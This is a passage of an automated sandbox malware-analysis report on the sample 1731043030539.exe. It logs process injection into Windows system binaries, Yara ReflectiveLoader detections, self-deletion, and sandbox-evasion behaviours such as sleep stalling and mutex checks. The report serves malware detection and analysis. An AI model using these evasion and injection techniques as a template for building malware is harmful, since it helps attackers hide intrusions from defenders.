Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\resmon.exe C:\Windows\SysWOW64\resmon.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\BackgroundTransferHost.exe C:\Windows\SysWOW64\BackgroundTransferHost.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: C:\Users\user\Desktop\1731043030539.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SysWOW64\fontview.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\resmon.exe C:\Windows\SysWOW64\resmon.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\BackgroundTransferHost.exe C:\Windows\SysWOW64\BackgroundTransferHost.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe	Jump to behavior

Source: C:\Users\user\Desktop\1731043030539.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1731043030539.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\1731043030539.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1731043030539.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1731043030539.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: 1731043030539.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 1731043030539.exe

Static file information: File size 1088000 > 1048576

Source: 1731043030539.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x107000

Source: 1731043030539.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: F:\8QProject\process_x64\x64\Release\process_x64_dll.pdb source: 1731043030539.exe

Data Obfuscation

Yara detected ReflectiveLoader

Source: Yara match	File source: 1731043030539.exe, type: SAMPLE
Source: Yara match	File source: 8.3.resmon.exe.23007f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1ad8b7f0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.1ad894834c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.control.exe.b107f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.1ad89460818.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1ad8b170000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1800280b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1ad8b650000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fontview.exe.8207f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1ad8b580000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1ad8b720000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.raserver.exe.2ac07f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1ad8b7f0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1ad8b720000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1ad8b650000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.1ad89460818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.control.exe.b107f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.raserver.exe.2ac07f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1ad8b170000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.resmon.exe.23007f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.BackgroundTransferHost.exe.6b07f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.BackgroundTransferHost.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fontview.exe.8207f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.control.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fontview.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1800280b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.raserver.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.1ad894834c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.resmon.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.1ad8b580000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3294823523.0000000010273000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2618083519.0000000002300000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2883861414.00000000006B0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2037787029.0000000000B10000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2336009620.0000000000820000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.3172524363.0000000002AC0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3295072698.0000000010273000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3294959038.0000000010273000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2033463108.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1731043030539.exe PID: 576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontview.exe PID: 5772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: resmon.exe PID: 3376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BackgroundTransferHost.exe PID: 6404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: raserver.exe PID: 5568, type: MEMORYSTR

Source: C:\Windows\System32\svchost.exe

Code function: 1_2_0000000180011C28 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_0000000180011C28

Source: 1731043030539.exe

Static PE information: section name: .sign

Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD89472B6F push ebp; iretd	1_3_000001AD89472B70
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD89472B8F push ebp; iretd	1_3_000001AD89472B90
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD89472BB8 push ebp; iretd	1_3_000001AD89472BB9
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B10EA4 push edi; ret	3_3_00BA8F07
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B118A4 push edi; ret	3_3_00B8CEF4
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B118AF push edi; ret	3_3_00B118BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B11692 push edi; ret	3_3_00BA7BEF
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B1189A push edi; ret	3_3_00B118A3
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B71CF1 push FFFFFFDDh; retf	3_3_00B71D7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B746D1 push edi; ret	3_3_00B746DD
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B118C0 push edi; ret	3_3_00B118C1
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B116CF push edi; ret	3_3_00B116DF
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B73E3D push edi; ret	3_3_00BB2619
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B73A75 push edi; ret	3_3_00B73A8E
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B11A75 pushad ; iretd	3_3_00B11A97
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B11675 push edi; ret	3_3_00B11677
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B10C7F push edi; ret	3_3_00B83E8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B72068 push edi; ret	3_3_00B72069
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B7225E push edi; ret	3_3_00B7225F
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B72046 push edi; ret	3_3_00B72056
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B72240 push dword ptr [ebx]; ret	3_3_00B72245
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B745A8 push edi; ret	3_3_00B82517
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B72582 push edi; ret	3_3_00B9BFD4
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B739C2 push edi; ret	3_3_00B739C5
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B739C8 push edi; ret	3_3_00B739C5
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B739C8 push dword ptr [ebx]; ret	3_3_00B739CD
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B71D27 push FFFFFFDDh; retf	3_3_00B71D7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B11306 push edi; ret	3_3_00B8C97D
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B72178 push edi; ret	3_3_00B87878
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B72578 push edi; ret	3_3_00BAB92B
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B7456A push edi; ret	3_3_00BA09D8

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\1731043030539.exe

Jump to behavior

Source: C:\Windows\System32\svchost.exe

Code function: 1_2_000000018000B790 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_000000018000B790

Source: C:\Users\user\Desktop\1731043030539.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1731043030539.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10006146	3_2_10006146
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10006376	3_2_10006376
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1000E971	3_2_1000E971
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10015AF6	3_2_10015AF6
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1000FBB2	3_2_1000FBB2
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1000FD2D	3_2_1000FD2D
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10006146	6_2_10006146
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10006376	6_2_10006376
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1000E971	6_2_1000E971
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10015AF6	6_2_10015AF6
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1000FBB2	6_2_1000FBB2
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1000FD2D	6_2_1000FD2D
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10006146	8_2_10006146
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10006376	8_2_10006376
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1000E971	8_2_1000E971
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10015AF6	8_2_10015AF6
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1000FBB2	8_2_1000FBB2
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1000FD2D	8_2_1000FD2D
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10006146	9_2_10006146
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10006376	9_2_10006376
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1000E971	9_2_1000E971
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10015AF6	9_2_10015AF6
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1000FBB2	9_2_1000FBB2
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1000FD2D	9_2_1000FD2D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10006146	10_2_10006146
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10006376	10_2_10006376
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_1000E971	10_2_1000E971
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10015AF6	10_2_10015AF6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_1000FBB2	10_2_1000FBB2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_1000FD2D	10_2_1000FD2D

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\fontview.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_6-31273
Source: C:\Windows\SysWOW64\resmon.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\raserver.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\control.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_3-31286

Found stalling execution ending in API Sleep call

Source: C:\Windows\SysWOW64\control.exe	Stalling execution: Execution stalls by calling Sleep	graph_3-32280
Source: C:\Windows\SysWOW64\fontview.exe	Stalling execution: Execution stalls by calling Sleep	graph_6-32278
Source: C:\Windows\SysWOW64\resmon.exe	Stalling execution: Execution stalls by calling Sleep
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Stalling execution: Execution stalls by calling Sleep

Source: C:\Windows\SysWOW64\control.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,inet_addr,inet_addr,SendARP,GlobalFree,	3_2_100021EB
Source: C:\Windows\SysWOW64\fontview.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,inet_addr,inet_addr,SendARP,GlobalFree,	6_2_100021EB
Source: C:\Windows\SysWOW64\resmon.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,inet_addr,inet_addr,SendARP,GlobalFree,	8_2_100021EB
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,inet_addr,inet_addr,SendARP,GlobalFree,	9_2_100021EB

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 886	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 868	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Window / User API: threadDelayed 1321	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Window / User API: threadDelayed 1185	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Window / User API: threadDelayed 1198	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Window / User API: threadDelayed 1227	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Window / User API: threadDelayed 1149	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe	Window / User API: threadDelayed 1197	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Window / User API: threadDelayed 1292	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Window / User API: threadDelayed 1242	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Window / User API: threadDelayed 692	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Window / User API: threadDelayed 721	Jump to behavior

Source: C:\Windows\SysWOW64\fontview.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)	graph_6-31891
Source: C:\Windows\SysWOW64\raserver.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\SysWOW64\control.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)	graph_3-31785
Source: C:\Windows\SysWOW64\resmon.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Windows\SysWOW64\control.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes	graph_3-32167
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\fontview.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes	graph_6-32334
Source: C:\Windows\SysWOW64\resmon.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\System32\svchost.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_1-8004

Source: C:\Users\user\Desktop\1731043030539.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-455

Source: C:\Windows\SysWOW64\raserver.exe

API coverage: 6.5 %

Source: C:\Windows\System32\svchost.exe TID: 2520	Thread sleep count: 116 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2520	Thread sleep time: -116000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 5568	Thread sleep count: 1321 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6688	Thread sleep count: 1185 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 1248	Thread sleep count: 73 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe TID: 6092	Thread sleep count: 1198 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe TID: 4012	Thread sleep count: 1227 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe TID: 2072	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe TID: 3628	Thread sleep count: 1149 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe TID: 3040	Thread sleep count: 1197 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\resmon.exe TID: 6368	Thread sleep count: 67 > 30	Jump to behavior
